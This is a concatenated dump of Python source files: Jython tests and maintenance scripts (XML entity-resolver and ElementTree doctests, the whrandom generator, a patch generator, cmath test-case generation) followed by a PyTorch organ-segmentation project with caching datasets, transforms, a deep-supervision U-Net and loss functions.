>>> def empty_source():
... _source = InputSource()
... byte_stream = ByteArrayInputStream(array([], "b"))
... _source.setByteStream(byte_stream)
... return _source
>>> class Handler(EntityResolver2):
... def getExternalSubset(self, name, baseURI):
... return None
... def resolveEntity(self, name, publicId, baseURI, systemId):
... print "Entity name:", name
... return empty_source()
>>> def main():
... sax_parser = "org.apache.xerces.parsers.SAXParser"
... reader = XMLReaderFactory.createXMLReader(sax_parser)
... entity_resolver2 = "http://xml.org/sax/features/use-entity-resolver2"
... enabled = reader.getFeature(entity_resolver2)
... print "Entity-Resolver2 enabled:", enabled
... handler = Handler()
... reader.setEntityResolver(handler)
... bytes = StringUtil.toBytes(xml)
... byte_stream = ByteArrayInputStream(bytes)
... source = InputSource(byte_stream)
... reader.parse(source)
>>> main()
Entity-Resolver2 enabled: True
Entity name: entity
"""
def test_close_file_iss1479():
# http://bugs.jython.org/issue1479
"""
>>> import os
>>> from test import test_support
>>> from xml.etree import ElementTree as ET
>>> ET.ElementTree(ET.XML('<test/>')).write(test_support.TESTFN)
>>> os.remove(test_support.TESTFN)
>>> fp = open(test_support.TESTFN, 'w')
>>> fp.write('<test/>')
>>> fp.close()
>>> tree = ET.parse(test_support.TESTFN)
>>> os.remove(test_support.TESTFN)
"""
def test_close_file_iss2413():
# http://bugs.jython.org/issue2413
"""
>>> import os
>>> from test import test_support
>>> from xml.etree import ElementTree as ET
>>> tree = ET.ElementTree(ET.XML('<test/>'))
>>> tree.write(test_support.TESTFN, encoding='an_unknown_encoding')
Traceback (most recent call last):
LookupError: unknown encoding 'an_unknown_encoding'
>>> os.remove(test_support.TESTFN)
"""
def test_main():
from test import test_xml_etree_jy
test_support.run_doctest(test_xml_etree_jy)
if __name__ == "__main__":
doctest.testmod()
```
#### File: Lib/test/whrandom.py
```python
class whrandom:
#
# Initialize an instance.
# Without arguments, initialize from current time.
# With arguments (x, y, z), initialize from them.
#
def __init__(self, x = 0, y = 0, z = 0):
self.seed(x, y, z)
#
# Set the seed from (x, y, z).
# These must be integers in the range [0, 256).
#
def seed(self, x = 0, y = 0, z = 0):
if not type(x) == type(y) == type(z) == type(0):
raise TypeError, 'seeds must be integers'
if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
raise ValueError, 'seeds must be in range(0, 256)'
if 0 == x == y == z:
# Initialize from current time
import time
t = long(time.time() * 256)
t = int((t&0xffffff) ^ (t>>24))
t, x = divmod(t, 256)
t, y = divmod(t, 256)
t, z = divmod(t, 256)
# Zero is a poor seed, so substitute 1
self._seed = (x or 1, y or 1, z or 1)
#
# Get the next random number in the range [0.0, 1.0).
#
def random(self):
x, y, z = self._seed
#
x = (171 * x) % 30269
y = (172 * y) % 30307
z = (170 * z) % 30323
#
self._seed = x, y, z
#
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0
#
# Get a random number in the range [a, b).
#
def uniform(self, a, b):
return a + (b-a) * self.random()
#
# Get a random integer in the range [a, b] including both end points.
#
def randint(self, a, b):
return a + int(self.random() * (b+1-a))
#
# Choose a random element from a non-empty sequence.
#
def choice(self, seq):
return seq[int(self.random() * len(seq))]
# Initialize from the current time
#
_inst = whrandom()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
randint = _inst.randint
choice = _inst.choice
```
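The comments above describe the classic Wichmann-Hill generator: three small linear congruential streams are combined into a single float in [0.0, 1.0). A minimal usage sketch follows, assuming the module is importable as `whrandom`; the seed values are arbitrary examples, not values taken from the repository.
```python
# Minimal sketch, assuming `whrandom` is on the import path; seeds (12, 34, 56) are arbitrary.
from whrandom import whrandom

gen = whrandom(12, 34, 56)         # fixed (x, y, z) seed -> reproducible sequence
print gen.random()                 # float in [0.0, 1.0)
print gen.uniform(5.0, 10.0)       # float in [5.0, 10.0)
print gen.randint(1, 6)            # integer in [1, 6], endpoints included
print gen.choice(['a', 'b', 'c'])  # random element of a non-empty sequence
```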
#### File: jython-whinchat/Misc/genpatches.py
```python
from StringIO import StringIO
import os.path
import subprocess
import sys
import shutil
def get_modules(path):
modules = set()
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
if filename.endswith('.py'):
cutoff = len(path) + 1
fullpath = os.path.join(dirpath[cutoff:], filename)
modules.add(fullpath)
return modules
if not os.path.exists('lib-python'):
print >>sys.stderr, 'You need to run this script from the Jython root directory.'
sys.exit(1)
if not os.path.exists('../cpython'):
print >>sys.stderr, 'You need to have the CPython clone in ../cpython.'
sys.exit(1)
jymodules = get_modules(u'Lib')
cpymodules = get_modules(u'lib-python')
cpy25modules = get_modules(u'../cpython/Lib')
common_modules = jymodules.intersection(cpy25modules).intersection(cpymodules)
# Run mercurial to get the changesets where each file was last synced with CPython stdlib
print 'Parsing mercurial logs for the last synchronized changesets'
changesets = {}
for mod in common_modules:
path = 'Lib/' + mod
pipe = subprocess.Popen(['hg', 'log', '-v', path], stdout=subprocess.PIPE)
stdoutdata, stderrdata = pipe.communicate()
if pipe.returncode != 0:
print >>sys.stderr, stderrdata
sys.exit(1)
buf = StringIO(stdoutdata)
changeset = None
found = False
iterator = iter(list(buf))
for line in iterator:
if line.startswith('changeset:'):
changeset = line.split(':')[1].strip()
if line.startswith('description:'):
for descline in iterator:
if descline == '\n':
break
if 'svn.python.org' in descline:
found = True
break
if found:
break
if not found:
print >>sys.stderr,'No sync changeset found for %s' % path
else:
changesets[path] = changeset
if os.path.exists('patches'):
shutil.rmtree('patches')
os.mkdir('patches')
print 'Generating patches'
for path, changeset in changesets.iteritems():
patchname = 'patches/%s.patch' % path[4:]
patch_dir = os.path.dirname(patchname)
if not os.path.exists(patch_dir):
os.makedirs(patch_dir)
retcode = os.system('hg diff -r {} {} > {}'.format(changeset, path, patchname))
if retcode != 0:
print >>sys.stderr, "Error creating patch for %s" % path
sys.exit(3)
print 'All done. You can now run applypatches.py to update and patch the modules.'
```
#### File: jython-whinchat/Misc/jython_checker.py
```python
import sys
def usage():
print 'Usage: jython jython_checker.py <module name created by make_checker>'
sys.exit(1)
if not len(sys.argv) == 2:
usage()
checker_name = sys.argv[1].split('.')[0]  # pop off the .py if needed
try:
checker = __import__(checker_name)
except:
print 'No module "%s" found' % checker_name
usage()
import make_checker
ignored_types = ['frame',
'code',
'traceback']
checks = []
for check in checker.checks:
index, expected_type, expected_bases, expected_dict = check
if checker.names[index] in ignored_types:
print 'Skipping', checker.names[index]
continue
checks.append(check)
ignored_members = ['__getattribute__', '__doc__']
ok, missing, bad_type, different = make_checker.do_check(checker.names, checks)
def strip_ignored(differences, key, ignored):
if not key in differences:
return
problems = differences[key]
for member in ignored:
if member in problems:
problems.remove(member)
for t, name, differences in different:
strip_ignored(differences, 'missing', ignored_members)
strip_ignored(differences, 'extras', ignored_members)
make_checker.report(ok, missing, bad_type, different)
```
#### File: jython-whinchat/Misc/make_cmath_testcases.py
```python
import math
import mpmath
# Table of additional real test cases. The layout is
#
# function : ( starting_number [ x1, x2, x3, ... ] ),
#
# Where tests will be numbered functionNNNN and each xn
# generates a new test with (complex) argument xn + 0j.
cases_to_generate = {
'atan' : ( 400, [
float.fromhex('0x1.fffffffffffffp1023'),
float.fromhex('-0x1.fffffffffffffp1023'),
1e-17, -1e-17, 1e-4, -1e-4,
1 - 1e-15, 1 + 1e-15,
14.101419947171719, # tan(1.5)
1255.7655915007896, # tan(1.57)
]),
'cos' : ( 50, [
1e-150, 1e-18, 1e-9, 0.0003, 0.2, 1.0,
-1e-18, -0.0003, -1.0,
1.0471975511965977, # -> 0.5
2.5707963267948966,
-2.5707963267948966,
18, 18.0
]),
'cosh' : ( 50, [
1e-150, 1e-18, 1e-9, 0.0003, 0.2, 1.0,
-1e-18, -0.0003, -1.0,
1.3169578969248167086, # -> 2.
-1.3169578969248167086,
25*math.log(2), # cosh != exp at 52 bits
27*math.log(2), # cosh == exp at 52 bits
709.7827, # not quite overflow
-709.7827, # not quite overflow
]),
'exp' : ( 70, [
1e-8, 0.0003, 0.2, 1.0,
-1e-8, -0.0003, -1.0,
2**-52, -2**-53, # exp != 1 (just)
2.3025850929940457, # -> 10
-2.3025850929940457,
709.7827, # not quite overflow
]),
'sin' : ( 50, [
1e-100, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.5235987755982989, # -> 0.5
-0.5235987755982989,
2.617993877991494365,
-2.617993877991494365,
]),
'sinh' : ( 50, [
1e-100, 5e-17, 1e-16, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
1.44363547517881034, # -> 2.
-1.44363547517881034,
25*math.log(2), # sinh != exp at 52 bits
27*math.log(2), # sinh == exp at 52 bits
709.7827, # not quite overflow
-709.7827, # not quite overflow
]),
'tan' : ( 50, [
1e-100, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.463647609000806116, # -> 0.5
-0.463647609000806116,
1.1071487177940905, # -> 0.5
-1.1071487177940905,
1.5,
1.57,
math.pi/2 - 2**-51,
]),
'tanh' : ( 50, [
1e-100, 5e-17, 1e-16, 3.7e-8, 0.001, 0.2, 1.0,
-3.7e-8, -0.001, -1.0,
0.54930614433405484, # -> 0.5
-0.54930614433405484,
25*math.log(2), # sinh != cosh at 52 bits
27*math.log(2), # sinh == cosh at 52 bits
711, # overflow cosh in naive impl
1.797e+308, # risk overflow
]),
'sqrt' : ( 150, [
float.fromhex('0x1.fffffffffffffp1023'),
float.fromhex('0x1.0p-1022'),
float.fromhex('0x0.0000000000001p-1022'),
]),
}
def generate_cases() :
fmt = "{}{:04d} {} {!r} 0.0 -> {} {!r}"
for fn in sorted(cases_to_generate.keys()):
print "-- Additional real values (Jython)"
count, xlist = cases_to_generate[fn]
for x in xlist:
# Compute the function (in the reference library)
func = getattr(mpmath, fn)
y = func(x)
# For the benefit of cmath tests, get the sign of imaginary zero right
zero = 0.0
if math.copysign(1., x) > 0.:
if fn=='cos' :
zero = -0.0
else :
if fn=='cosh' :
zero = -0.0
# Output one test case at sufficient precision
print fmt.format(fn, count, fn, x, mpmath.nstr(y, 20), zero )
count += 1
def test_main():
with mpmath.workprec(100):
generate_cases()
if __name__ == '__main__':
test_main()
# Conveniences for interactive use
from mpmath import mp, mpf, workprec, workdps, nstr
```
#### File: animal/reptile/snake.py
```python
import croc
class Snake:
def eats(self, thing):
return False
class Python(Snake):
def eats(self, thing):
return isinstance(thing, croc.Gavial)
```
|
{
"source": "jeff7021/organseg_dags",
"score": 3
}
|
#### File: organseg_dags/cacheio/Dataset.py
```python
import hashlib
import pickle
import collections
from copy import deepcopy
from pathlib import Path
from abc import ABC, abstractmethod
from typing import Any, Optional, Callable, Sequence, Union, Dict, Tuple, Hashable, Mapping
import torch
import numpy as np
import nibabel as nib
from scipy.ndimage import rotate
from torch.utils.data import Dataset as _TorchDataset
MAX_SEED = np.iinfo(np.uint32).max + 1  # 2**32
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None, progress: bool = True) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
progress: whether to display a progress bar.
"""
self.data = data
self.transform = transform
self.progress = progress
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index: int):
data_ = self.data[index]
if self.transform is not None:
data_ = apply_transform(self.transform, data_)
return data_
class Randomizable(ABC):
"""
An interface for handling random state locally, currently based on a class variable `R`,
which is an instance of `np.random.RandomState`.
"""
R: np.random.RandomState = np.random.RandomState()
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Randomizable":
if seed is not None:
_seed = id(seed) if not isinstance(seed, (int, np.integer)) else seed
_seed = _seed % MAX_SEED # _seed must be in [0, MAX_SEED - 1] for uint32
self.R = np.random.RandomState(_seed)
return self # for method cascading
if state is not None:
if not isinstance(state, np.random.RandomState):
raise TypeError(f"state must be None or a np.random.RandomState but is {type(state).__name__}.")
self.R = state
return self
self.R = np.random.RandomState()
return self
@abstractmethod
def randomize(self, data: Any) -> None:
raise NotImplementedError(f"Subclass {self.__class__.__name__} must implement this method.")
class Transform(ABC):
@abstractmethod
def __call__(self, data: Any):
raise NotImplementedError(f"Subclass {self.__class__.__name__} must implement this method")
class RandomizableTransform(Randomizable, Transform):
def __init__(self, prob=1.0, do_transform=False):
self._do_transform = do_transform
self.prob = min(max(prob, 0.0), 1.0)
def randomize(self, data: Any) -> None:
self._do_transform = self.R.rand() < self.prob
class Compose:
def __init__(self, transforms: Union[Sequence[Callable], Callable]) -> None:
if transforms is None:
transforms = ()
self.transforms = ensure_tuple(transforms)
def __call__(self, input_):
for _transform in self.transforms:
input_ = _transform(input_) # avoid naming conflicts
return input_
def apply_transform(transform: Callable, data, map_items: bool = True):
try:
if isinstance(data, (list, tuple)) and map_items:
return [transform(item) for item in data]
return transform(data)
except Exception as e:
raise RuntimeError(f"applying transform {transform}") from e
def pickle_hashing(item, protocol=pickle.HIGHEST_PROTOCOL) -> bytes:
# NOTE: Sort the item using the same key function so that dicts that
# have the same key-value pairs can produce a consistent hash value.
cache_key = hashlib.md5(pickle.dumps(sorted_dict(item), protocol=protocol)).hexdigest() # encode a hash value using the hash algorithm (message digest 5, MD5)
return f"{cache_key}".encode("utf-8")
def sorted_dict(item, key=None, reverse=False):
"""Return a new sorted dictionary from the `item`."""
if not isinstance(item, dict):
return item
return {k: sorted_dict(v) if isinstance(v, dict) else v for k, v in sorted(item.items(), key=key, reverse=reverse)} # item may be a list of dicts
def ensure_tuple(vals: Any) -> Tuple[Any, ...]:
"""Return a tuple of `vals`"""
if not isinstance(vals, collections.abc.Iterable) or isinstance(vals, str): # not an iterable instance or is an iterable instance but is an instance of `str`
vals = (vals, )
return tuple(vals)
def normalize_foreground(img, label):
nonzero_label = np.where(label>0, 1, 0)
mean = np.sum(img * nonzero_label) / np.prod(nonzero_label.shape)
std = np.sqrt(np.sum(np.square(img - mean) * nonzero_label) / np.prod(nonzero_label.shape))
img = (img - mean) / std
return img
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependent transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependent parts of transform processing.
Note:
The input data must be a list of file paths and will hash them as cache keys.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]] = None,
hash_func: Callable[..., bytes] = pickle_hashing,
progress: bool = True,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
progress: whether to display a progress bar.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform, progress=progress)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():  # create the cache directory if it does not exist yet
self.cache_dir.mkdir(parents=True)
if not self.cache_dir.is_dir():  # the path exists but is not a directory
raise ValueError("cache_dir must be a directory.")
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms: # self.transform is an instance of Compose
# execute all the deterministic transforms
if isinstance(_transform, RandomizableTransform) or not isinstance(_transform, Transform):
break
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, RandomizableTransform)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True # indicate that all transforms will be processed
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed: Mapping[Hashable, str]):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependent on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt" # save the pre-transformed data using .pt file extension
if hashfile is not None and hashfile.is_file(): # cache hit
return torch.load(hashfile)
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed, because it is reused in every epoch.
if hashfile is not None:
# NOTE: Writing to ".temp_write_cache" and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
temp_hash_file = hashfile.with_suffix(".temp_write_cache")
torch.save(_item_transformed, temp_hash_file)
temp_hash_file.rename(hashfile)
return _item_transformed
def __getitem__(self, index: int):
pre_random_item = self._cachecheck(self.data[index]) # make sure data is pre-transformed and cached
return self._post_transform(pre_random_item)
class RegularDataset(Dataset):
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable]):
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data, transform)
def __getitem__(self, ind: int):
d = self.data[ind]
for _transform in self.transform.transforms: # self.transform is an instance of `Compose`
d = apply_transform(_transform, d) # process all the rest of transforms
return d
class LoadImage(Transform):
"""
Dictionary-based loading image
"""
def __init__(
self,
keys: Sequence[str],
dtype: np.dtype = np.float32) -> None:
self.keys = keys
self.dtype = dtype
def __call__(
self,
data: Mapping[Hashable, str]) -> np.ndarray:
d = dict(data)
for key in self.keys:
d_tmp = nib.load(d[key]).get_data()
# flip to align orientation. See great performance gain.
# Key design of the second group of experiments.
if 'tcia' in d[key]:
d_tmp = d_tmp[:, :, ::-1]
d[key] = d_tmp.astype(self.dtype)
return d
class Clip(Transform):
"""
Dictionary-base intensity clip
"""
def __init__(
self,
keys: Sequence[str],
min: float,
max: float,) -> None:
self.keys = keys
self.min = min
self.max = max
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
d = dict(data)
for key in self.keys:
d[key] = np.clip(data[key], self.min, self.max) # functionality
return d
class ForeNormalize(Transform):
"""
Dictionary-based intensity normalization
"""
def __init__(
self,
keys: Sequence[str],
mask_key: str) -> None:
self.keys = keys
self.mask_key = mask_key
self.norm = normalize_foreground # functionality
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
d = dict(data)
for key in self.keys:
d[key] = self.norm(data[key], data[self.mask_key])
return d
class RandFlip(RandomizableTransform):
"""
Dictionary-based random flip
"""
def __init__(
self,
keys: Sequence[str],
prob: float = 0.5,
spatial_axis: Optional[Sequence[int]] = (0, 1),
) -> None:
super().__init__(prob)
self.keys = keys
self.spatial_axis = spatial_axis
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
super().randomize(None)
d = dict(data)
if self._do_transform:
flip_axis = self.R.choice(self.spatial_axis)  # draw from the transform's own random state for reproducibility
for key in self.keys:
d[key] = np.flip(data[key], axis=flip_axis) # functionality
return d
class RandRotate(RandomizableTransform):
"""
Dictionary-based random rotation
"""
def __init__(
self,
keys: Sequence[str],
interp_order: Sequence[int],
angle: Optional[float] = 15.0,
prob: Optional[float] = 0.5,
) -> None:
super().__init__(prob)
self.keys = keys
self.interp_order = interp_order
self.angle = angle
def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
super().randomize(None)
the_angle = self.R.uniform(low=-self.angle, high=self.angle)
d = dict(data)
if self._do_transform:
for i, key in enumerate(self.keys):
d[key] = rotate(data[key], angle=the_angle, axes=(0, 1), reshape=False, order=self.interp_order[i]) # functionality
return d
class ToTensor(Transform):
"""
Dictionary-based ToTensor
"""
def __init__(self, keys: Sequence[str]) -> None:
self.keys = keys
def __call__(self, data: Mapping[Hashable, Union[np.ndarray, torch.Tensor]]) -> torch.Tensor:
d = dict(data)
for key in self.keys:
if isinstance(data[key], torch.Tensor):
d[key] = data[key].contiguous()
else:
d[key] = torch.as_tensor(np.ascontiguousarray(data[key][None])) # functionality: add a channel dimension to the image array before converting it to a tensor
return d
```
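A minimal usage sketch of the caching pipeline described in the `PersistentDataset` docstring, built only from the transforms defined in this file. The file paths, clip window, and cache directory are illustrative assumptions, not values from the repository.
```python
# Sketch only: paths, clip range and cache_dir are placeholder assumptions.
train_files = [
    {'image': 'image1.nii.gz', 'label': 'label1.nii.gz'},
    {'image': 'image2.nii.gz', 'label': 'label2.nii.gz'},
]
transforms = [
    LoadImage(keys=['image', 'label']),               # deterministic -> cached once
    Clip(keys=['image'], min=-250.0, max=200.0),      # deterministic -> cached once
    ForeNormalize(keys=['image'], mask_key='label'),  # deterministic -> cached once
    RandFlip(keys=['image', 'label'], prob=0.5),      # random -> re-applied every epoch
    RandRotate(keys=['image', 'label'], interp_order=[3, 0]),
    ToTensor(keys=['image', 'label']),
]
dataset = PersistentDataset(data=train_files, transform=transforms, cache_dir='./cache_dir')
sample = dataset[0]  # first access computes and caches the pre-random result
```
On the first access, `_cachecheck` runs the deterministic prefix of the pipeline and stores the result under an MD5 hash of the input dictionary; every later `__getitem__` loads that file from `cache_dir` and only re-applies the random transforms.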
#### File: models/unet_nine_layers/unet_l9_deep_sup_full_scheme.py
```python
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from models.unet import Encoder, Decoder, DoubleConv
from models.unet_nine_layers.unet_l9_deep_sup import DeepSup
from models.unet_nine_layers.unet_l9_deep_sup_edge import EGModule
from models.unet_nine_layers.unet_l9_deep_sup_edge_skip import edge_fusion
from models.unet_nine_layers.unet_l9_deep_sup_rfp import RFP_UAGs
class UNetL9DeepSupFullScheme(nn.Module):
def __init__(self, in_ch, out_ch, num_neigh='four', interpolate=True, init_ch=16, conv_layer_order='cbr'):
super(UNetL9DeepSupFullScheme, self).__init__()
self.no_class = out_ch
## Encoder
self.encoders = nn.ModuleList([
Encoder(in_ch, init_ch, is_max_pool=False, conv_layer_order=conv_layer_order),
Encoder(init_ch, 2 * init_ch, conv_layer_order=conv_layer_order),
Encoder(2 * init_ch, 4 * init_ch, conv_layer_order=conv_layer_order),
Encoder(4 * init_ch, 8 * init_ch, conv_layer_order=conv_layer_order),
Encoder(8 * init_ch, 16 * init_ch, conv_layer_order=conv_layer_order)
])
## Decoder
self.decoders = nn.ModuleList([
Decoder(8*init_ch+16*init_ch+32, 8*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(4*init_ch+8*init_ch+32, 4*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(2*init_ch+4*init_ch+32, 2*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(init_ch+2*init_ch+32, init_ch, interpolate, conv_layer_order=conv_layer_order)
])
# deep supervision
self.deep_sup4 = DeepSup(8 * init_ch, out_ch=self.no_class, scale_factor=8)
self.deep_sup3 = DeepSup(4 * init_ch, out_ch=self.no_class, scale_factor=4)
self.deep_sup2 = DeepSup(2 * init_ch, out_ch=self.no_class, scale_factor=2)
self.deep_sup1 = nn.Conv3d(init_ch, self.no_class, kernel_size=1)
## Edge detection
self.edge_module = EGModule(init_ch)
self.final_conv = nn.Sequential(nn.Dropout3d(0.1, False),
nn.Conv3d(self.no_class * 4, self.no_class, 1))
## RFP-Head
trans_ch = 16 * init_ch // 2
self.adapt = nn.Sequential(
nn.Conv3d(16*init_ch, trans_ch, 3, padding=1, bias=False),
nn.BatchNorm3d(trans_ch),
nn.ReLU(),
)
self.rfp = RFP_UAGs(in_ch=trans_ch, num_neigh=num_neigh)
self.rfp_fnl_conv = nn.Sequential(
nn.Conv3d(trans_ch, trans_ch, 3, padding=1, bias=False),
nn.BatchNorm3d(trans_ch),
nn.ReLU(),
nn.Conv3d(trans_ch, self.no_class, 1)
)
# Out conv
self.comb_fnl_conv = nn.Conv3d(self.no_class * 2, self.no_class, 1)
def forward(self, x):
encoders_features = []
enc1 = self.encoders[0](x)
enc2 = self.encoders[1](enc1)
enc3 = self.encoders[2](enc2)
enc4 = self.encoders[3](enc3)
mid = self.encoders[4](enc4)
encoders_features = [enc4, enc3, enc2, enc1]
# Edge detection
edge_feat, edge_score = self.edge_module(enc2, mid)
# Edge skip-connections
skip4 = edge_fusion(enc4, edge_feat)
skip3 = edge_fusion(enc3, edge_feat)
skip2 = edge_fusion(enc2, edge_feat)
skip1 = edge_fusion(enc1, edge_feat)
dec4 = self.decoders[0](skip4, mid)
dec3 = self.decoders[1](skip3, dec4)
dec2 = self.decoders[2](skip2, dec3)
dec1 = self.decoders[3](skip1, dec2)
dsup4 = self.deep_sup4(dec4)
dsup3 = self.deep_sup3(dec3)
dsup2 = self.deep_sup2(dec2)
dsup1 = self.deep_sup1(dec1)
seg_score = self.final_conv(torch.cat((dsup4, dsup3, dsup2, dsup1), dim=1))
# RFP-Head
mid_adapt = self.adapt(mid)
ehn_mid = self.rfp(mid_adapt)
rfp_seg_score = self.rfp_fnl_conv(ehn_mid)
rfp_seg_score = F.upsample(rfp_seg_score, scale_factor=16, mode='trilinear', align_corners=True)
comb_seg_score = self.comb_fnl_conv(torch.cat((seg_score, rfp_seg_score), 1))
return seg_score, comb_seg_score, edge_score
if __name__ == '__main__':
import time
import os
from torchsummary import summary
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model = UNetL9DeepSupFullScheme(1, 9, num_neigh='eight', init_ch=16, conv_layer_order='cbr', interpolate=True)
device = torch.device('cuda')
model = model.to(device)
data = torch.randn((1, 1, 160, 160, 64)).cuda()
tic = time.time()
x = model(data)
toc = time.time()
print('Inference Time {:.4f}'.format(toc-tic))
# four neighbor: 0.9381 s
# eight neighbor: 2.3929 s
# summary(model, (1, 160, 160, 64))
# from models.unet_nine_layers.unet_l9 import count_parameters
# print('Total number of trainable parameters: {:.2f} M'.format(count_parameters(model) / 1e6))
```
#### File: jeff7021/organseg_dags/utils.py
```python
import os
import random
import json
import numpy as np
import nibabel as nib
import SimpleITK as sitk
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.model_selection import KFold
from metrics import dice
criterion_ce = torch.nn.CrossEntropyLoss() # combine softmax and CE
def get_num(path):
"""labelxxxx.nii.gz"""
return os.path.basename(path).split('.')[0][-4:]
def tup_to_dict(file_list):
out_list = []
for tup in file_list:
dct = {}
dct['img_file'] = tup[0]
dct['image'] = tup[0]
dct['label'] = tup[1]
dct['edge'] = tup[2]
out_list.append(dct)
return out_list
def mfb_ce(input, target):
"""
median frequency balancing weighted cross-entropy loss
:param input: B * C * H * W * D
:param target: B * H * W * D
:return:
"""
# self.class_mapping = {
# "1": "spleen", #
# "2": 'left kidney', # 3 -> 2
# "3": 'gallbladder', # 4 -> 3
# "4": 'esophagus', # 5 -> 4
# "5": 'liver', # 6 -> 5
# "6": 'stomach', # 7 -> 6
# "7": 'pancreas', # 11 -> 7
# "8": 'duodenum', # 14 -> 8
# }
mfb_weights = torch.Tensor([0.01296055, 0.6061528, 1., 6.39558407, 10.95443216,
0.09695645, 0.41963412, 2.04366128, 1.85810754]).cuda()
# softmax + ce
return F.cross_entropy(input, target, mfb_weights, reduction='mean')
def bce2d_new(input, target, reduction='mean'):
"""EGNet ICCV 2019"""
assert(input.size() == target.size())
# for every positions, return 1 if same
pos = torch.eq(target, 1).float()
neg = torch.eq(target, 0).float()
# ing = ((torch.gt(target, 0) & torch.lt(target, 1))).float()
num_pos = torch.sum(pos)
num_neg = torch.sum(neg)
num_total = num_pos + num_neg
alpha = num_neg / num_total
beta = 1.1 * num_pos / num_total
    # target pixel = 1 -> weight alpha (fraction of negative pixels)
